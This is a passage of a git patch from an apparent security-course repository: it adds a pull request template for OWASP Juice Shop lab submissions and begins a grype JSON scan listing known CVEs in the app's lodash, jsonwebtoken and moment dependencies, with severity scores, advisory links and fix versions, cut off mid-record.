From 4ab710bb3f4beb3d22c450e69f0b7006f9eb6e68 Mon Sep 17 00:00:00 2001 From: Marat <139675556+Muratich@users.noreply.github.com> Date: Fri, 12 Jun 2026 13:13:16 +0300 Subject: [PATCH 1/2] chore: add pull request template --- .github/PULL_REQUEST_TEMPLATE.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 .github/PULL_REQUEST_TEMPLATE.md diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md new file mode 100644 index 000000000..7154aec08 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -0,0 +1,28 @@ +## Goal +Describe what this PR delivers in one sentence. + +## Changes +- Added / updated: + - `submissions/lab1.md` + - `.github/PULL_REQUEST_TEMPLATE.md` +- Other changes: + - ... + +## Testing +- Commands run: + - `docker run -d --name juice-shop -p 127.0.0.1:3000:3000 bkimminich/juice-shop:v20.0.0` + - `curl http://127.0.0.1:3000` +- Observed output: + - HTTP 200 on `/` + - Juice Shop reachable at `http://127.0.0.1:3000` + +## Artifacts & Screenshots +- `submissions/lab1.md` +- Screenshots / links: + - ... + - ... + +## Checklist +- [ ] Title is clear (`feat(labN): ` style) +- [ ] No secrets or large temp files are committed +- [ ] Submission file at `submissions/labN.md` exists From 9a1e6f18062c0afa2a3ae0ca65fecaf1ca862a53 Mon Sep 17 00:00:00 2001 From: Marat <139675556+Muratich@users.noreply.github.com> Date: Thu, 9 Jul 2026 18:29:39 +0300 Subject: [PATCH 2/2] feat(lab10): defectdojo governance report + capstone walkthrough --- labs/lab4/grype-from-sbom.json | 1 + labs/lab4/grype-from-sbom.txt | Bin 0 -> 29998 bytes labs/lab4/trivy.json | 25658 +++++++++++++++++++++++++++++ labs/lab4/trivy.txt | Bin 0 -> 1039754 bytes submissions/lab10-walkthrough.md | 54 + submissions/lab10.md | 83 + 6 files changed, 25796 insertions(+) create mode 100644 labs/lab4/grype-from-sbom.json create mode 100644 labs/lab4/grype-from-sbom.txt create mode 100644 labs/lab4/trivy.json create mode 100644 labs/lab4/trivy.txt create mode 100644 submissions/lab10-walkthrough.md create mode 100644 submissions/lab10.md diff --git a/labs/lab4/grype-from-sbom.json b/labs/lab4/grype-from-sbom.json new file mode 100644 index 000000000..83223d6c2 --- /dev/null +++ b/labs/lab4/grype-from-sbom.json @@ -0,0 +1 @@ +{"matches":[{"vulnerability":{"id":"GHSA-35jh-r3h4-6jhm","dataSource":"https://github.com/advisories/GHSA-35jh-r3h4-6jhm","namespace":"github:language:javascript","severity":"High","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-23337","https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c","https://snyk.io/vuln/SNYK-JS-LODASH-1040724","https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851","https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929","https://www.oracle.com//security-alerts/cpujul2021.html","https://www.oracle.com/security-alerts/cpuoct2021.html","https://www.oracle.com/security-alerts/cpujan2022.html","https://www.oracle.com/security-alerts/cpujul2022.html","https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","https://security.netapp.com/advisory/ntap-20210312-0006","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml"],"description":"Command Injection in lodash","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":7.2,"exploitabilityScore":1.3,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-23337","epss":0.2241,"percentile":0.97393,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2021-23337","cwe":"CWE-94","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.17.21"],"state":"fixed","available":[{"version":"4.17.21","date":"2021-05-07","kind":"first-observed"}]},"advisories":[],"risk":16.471349999999997},"relatedVulnerabilities":[{"id":"CVE-2021-23337","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2021-23337","namespace":"nvd:cpe","severity":"High","urls":["https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf","https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851","https://security.netapp.com/advisory/ntap-20210312-0006/","https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931","https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929","https://snyk.io/vuln/SNYK-JS-LODASH-1040724","https://www.oracle.com//security-alerts/cpujul2021.html","https://www.oracle.com/security-alerts/cpujan2022.html","https://www.oracle.com/security-alerts/cpujul2022.html","https://www.oracle.com/security-alerts/cpuoct2021.html"],"description":"Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":7.2,"exploitabilityScore":1.3,"impactScore":5.9},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:S/C:P/I:P/A:P","metrics":{"baseScore":6.5,"exploitabilityScore":8,"impactScore":6.5},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":7.2,"exploitabilityScore":1.3,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2021-23337","epss":0.2241,"percentile":0.97393,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2021-23337","cwe":"CWE-94","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash","version":"2.4.2"}},"found":{"vulnerabilityID":"GHSA-35jh-r3h4-6jhm","versionConstraint":"<4.17.21 (semantic)"},"fix":{"suggestedVersion":"4.17.21"}}],"artifact":{"id":"pkg:npm/lodash@2.4.2?package-id=dbbb92a4d9c4d340","name":"lodash","version":"2.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash:lodash:2.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/lodash@2.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-c7hr-j4mj-j2w6","dataSource":"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6","namespace":"github:language:javascript","severity":"Critical","urls":["https://nvd.nist.gov/vuln/detail/CVE-2015-9235","https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687","https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/","https://www.npmjs.com/advisories/17","https://www.timmclean.net/2015/02/25/jwt-alg-none.html"],"description":"Verification Bypass in jsonwebtoken","cvss":[],"epss":[{"cve":"CVE-2015-9235","epss":0.07248,"percentile":0.93523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2015-9235","cwe":"CWE-20","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2015-9235","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.2.2"],"state":"fixed","available":[{"version":"4.2.2","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":6.5232},"relatedVulnerabilities":[{"id":"CVE-2015-9235","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2015-9235","namespace":"nvd:cpe","severity":"Critical","urls":["https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/","https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687","https://nodesecurity.io/advisories/17","https://www.timmclean.net/2015/02/25/jwt-alg-none.html"],"description":"In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":9.8,"exploitabilityScore":3.9,"impactScore":5.9},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:P/A:P","metrics":{"baseScore":7.5,"exploitabilityScore":10,"impactScore":6.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2015-9235","epss":0.07248,"percentile":0.93523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2015-9235","cwe":"CWE-20","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2015-9235","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.1.0"}},"found":{"vulnerabilityID":"GHSA-c7hr-j4mj-j2w6","versionConstraint":"<4.2.2 (semantic)"},"fix":{"suggestedVersion":"4.2.2"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.1.0?package-id=c29669d438fb9e38","name":"jsonwebtoken","version":"0.1.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.1.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.1.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-c7hr-j4mj-j2w6","dataSource":"https://github.com/advisories/GHSA-c7hr-j4mj-j2w6","namespace":"github:language:javascript","severity":"Critical","urls":["https://nvd.nist.gov/vuln/detail/CVE-2015-9235","https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687","https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/","https://www.npmjs.com/advisories/17","https://www.timmclean.net/2015/02/25/jwt-alg-none.html"],"description":"Verification Bypass in jsonwebtoken","cvss":[],"epss":[{"cve":"CVE-2015-9235","epss":0.07248,"percentile":0.93523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2015-9235","cwe":"CWE-20","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2015-9235","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.2.2"],"state":"fixed","available":[{"version":"4.2.2","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":6.5232},"relatedVulnerabilities":[{"id":"CVE-2015-9235","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2015-9235","namespace":"nvd:cpe","severity":"Critical","urls":["https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/","https://github.com/auth0/node-jsonwebtoken/commit/1bb584bc382295eeb7ee8c4452a673a77a68b687","https://nodesecurity.io/advisories/17","https://www.timmclean.net/2015/02/25/jwt-alg-none.html"],"description":"In jsonwebtoken node module before 4.2.2 it is possible for an attacker to bypass verification when a token digitally signed with an asymmetric key (RS/ES family) of algorithms but instead the attacker send a token digitally signed with a symmetric algorithm (HS* family).","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":9.8,"exploitabilityScore":3.9,"impactScore":5.9},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:P/I:P/A:P","metrics":{"baseScore":7.5,"exploitabilityScore":10,"impactScore":6.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2015-9235","epss":0.07248,"percentile":0.93523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2015-9235","cwe":"CWE-20","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2015-9235","cwe":"CWE-327","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.4.0"}},"found":{"vulnerabilityID":"GHSA-c7hr-j4mj-j2w6","versionConstraint":"<4.2.2 (semantic)"},"fix":{"suggestedVersion":"4.2.2"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.4.0?package-id=1e23bc54c16fbe6d","name":"jsonwebtoken","version":"0.4.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.4.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.4.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-87vv-r9j6-g5qv","dataSource":"https://github.com/advisories/GHSA-87vv-r9j6-g5qv","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2016-4055","https://www.npmjs.com/advisories/55","https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E","https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E","https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E","https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E","https://www.tenable.com/security/tns-2019-02","http://www.openwall.com/lists/oss-security/2016/04/20/11","http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html","http://www.securityfocus.com/bid/95849"],"description":"Regular Expression Denial of Service in moment","cvss":[{"type":"Secondary","version":"3.0","vector":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2016-4055","epss":0.09905,"percentile":0.94961,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2016-4055","cwe":"CWE-400","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["2.11.2"],"state":"fixed","available":[{"version":"2.11.2","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":5.695374999999999},"relatedVulnerabilities":[{"id":"CVE-2016-4055","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2016-4055","namespace":"nvd:cpe","severity":"Medium","urls":["http://www.openwall.com/lists/oss-security/2016/04/20/11","http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html","http://www.securityfocus.com/bid/95849","https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E","https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E","https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E","https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E","https://nodesecurity.io/advisories/55","https://www.tenable.com/security/tns-2019-02"],"description":"The duration function in the moment package before 2.11.2 for Node.js allows remote attackers to cause a denial of service (CPU consumption) via a long string, aka a \"regular expression Denial of Service (ReDoS).\"","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:N/A:C","metrics":{"baseScore":7.8,"exploitabilityScore":10,"impactScore":6.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2016-4055","epss":0.09905,"percentile":0.94961,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2016-4055","cwe":"CWE-400","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"moment","version":"2.0.0"}},"found":{"vulnerabilityID":"GHSA-87vv-r9j6-g5qv","versionConstraint":"<2.11.2 (semantic)"},"fix":{"suggestedVersion":"2.11.2"}}],"artifact":{"id":"pkg:npm/moment@2.0.0?package-id=fb07dad56d7726f5","name":"moment","version":"2.0.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/moment/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:momentjs:moment:2.0.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/moment@2.0.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-jf85-cpcp-j695","dataSource":"https://github.com/advisories/GHSA-jf85-cpcp-j695","namespace":"github:language:javascript","severity":"Critical","urls":["https://github.com/lodash/lodash/pull/4336","https://nvd.nist.gov/vuln/detail/CVE-2019-10744","https://snyk.io/vuln/SNYK-JS-LODASH-450202","https://access.redhat.com/errata/RHSA-2019:3024","https://support.f5.com/csp/article/K47105354?utm_source=f5support&utm_medium=RSS","https://www.oracle.com/security-alerts/cpujan2021.html","https://www.oracle.com/security-alerts/cpuoct2020.html","https://support.f5.com/csp/article/K47105354?utm_source=f5support&%3Butm_medium=RSS","https://security.netapp.com/advisory/ntap-20191004-0005","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml"],"description":"Prototype Pollution in lodash","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-10744","epss":0.05006,"percentile":0.9111,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-10744","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.17.12"],"state":"fixed","available":[{"version":"4.17.12","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":4.53043},"relatedVulnerabilities":[{"id":"CVE-2019-10744","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2019-10744","namespace":"nvd:cpe","severity":"Critical","urls":["https://access.redhat.com/errata/RHSA-2019:3024","https://security.netapp.com/advisory/ntap-20191004-0005/","https://snyk.io/vuln/SNYK-JS-LODASH-450202","https://support.f5.com/csp/article/K47105354?utm_source=f5support&%3Butm_medium=RSS","https://www.oracle.com/security-alerts/cpujan2021.html","https://www.oracle.com/security-alerts/cpuoct2020.html"],"description":"Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","metrics":{"baseScore":9.1,"exploitabilityScore":3.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:P/A:P","metrics":{"baseScore":6.4,"exploitabilityScore":10,"impactScore":5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2019-10744","epss":0.05006,"percentile":0.9111,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2019-10744","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash","version":"2.4.2"}},"found":{"vulnerabilityID":"GHSA-jf85-cpcp-j695","versionConstraint":"<4.17.12 (semantic)"},"fix":{"suggestedVersion":"4.17.12"}}],"artifact":{"id":"pkg:npm/lodash@2.4.2?package-id=dbbb92a4d9c4d340","name":"lodash","version":"2.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash:lodash:2.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/lodash@2.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-8hfj-j24r-96c4","dataSource":"https://github.com/advisories/GHSA-8hfj-j24r-96c4","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4","https://nvd.nist.gov/vuln/detail/CVE-2022-24785","https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5","https://www.tenable.com/security/tns-2022-09","https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5","https://security.netapp.com/advisory/ntap-20220513-0006","https://security.netapp.com/advisory/ntap-20241108-0002"],"description":"Path Traversal: 'dir/../../filename' in moment.locale","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-24785","epss":0.05356,"percentile":0.91578,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-24785","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-24785","cwe":"CWE-27","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-24785","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["2.29.2"],"state":"fixed","available":[{"version":"2.29.2","date":"2022-04-09","kind":"first-observed"}]},"advisories":[],"risk":4.017},"relatedVulnerabilities":[{"id":"CVE-2022-24785","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-24785","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5","https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4","https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q/","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5/","https://security.netapp.com/advisory/ntap-20220513-0006/","https://www.tenable.com/security/tns-2022-09","https://security.netapp.com/advisory/ntap-20241108-0002/"],"description":"Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:P/A:N","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-24785","epss":0.05356,"percentile":0.91578,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-24785","cwe":"CWE-22","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-24785","cwe":"CWE-27","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-24785","cwe":"CWE-22","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"moment","version":"2.0.0"}},"found":{"vulnerabilityID":"GHSA-8hfj-j24r-96c4","versionConstraint":"<2.29.2 (semantic)"},"fix":{"suggestedVersion":"2.29.2"}}],"artifact":{"id":"pkg:npm/moment@2.0.0?package-id=fb07dad56d7726f5","name":"moment","version":"2.0.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/moment/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:momentjs:moment:2.0.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/moment@2.0.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-p6mc-m468-83gw","dataSource":"https://github.com/advisories/GHSA-p6mc-m468-83gw","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/lodash/lodash/issues/4744","https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12","https://nvd.nist.gov/vuln/detail/CVE-2020-8203","https://hackerone.com/reports/712065","https://github.com/lodash/lodash/issues/4874","https://github.com/github/advisory-database/pull/2884","https://hackerone.com/reports/864701","https://github.com/lodash/lodash/wiki/Changelog#v41719","https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744","https://security.netapp.com/advisory/ntap-20200724-0006","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml"],"description":"Prototype Pollution in lodash","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H","metrics":{"baseScore":7.4,"exploitabilityScore":2.3,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2020-8203","epss":0.05213,"percentile":0.91408,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2020-8203","cwe":"CWE-770","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2020-8203","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":[],"state":"not-fixed"},"advisories":[],"risk":3.883685},"relatedVulnerabilities":[{"id":"CVE-2020-8203","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2020-8203","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/lodash/lodash/issues/4874","https://hackerone.com/reports/712065","https://security.netapp.com/advisory/ntap-20200724-0006/","https://www.oracle.com//security-alerts/cpujul2021.html","https://www.oracle.com/security-alerts/cpuApr2021.html","https://www.oracle.com/security-alerts/cpuapr2022.html","https://www.oracle.com/security-alerts/cpujan2022.html","https://www.oracle.com/security-alerts/cpuoct2021.html"],"description":"Prototype pollution attack when using _.zipObjectDeep in lodash before 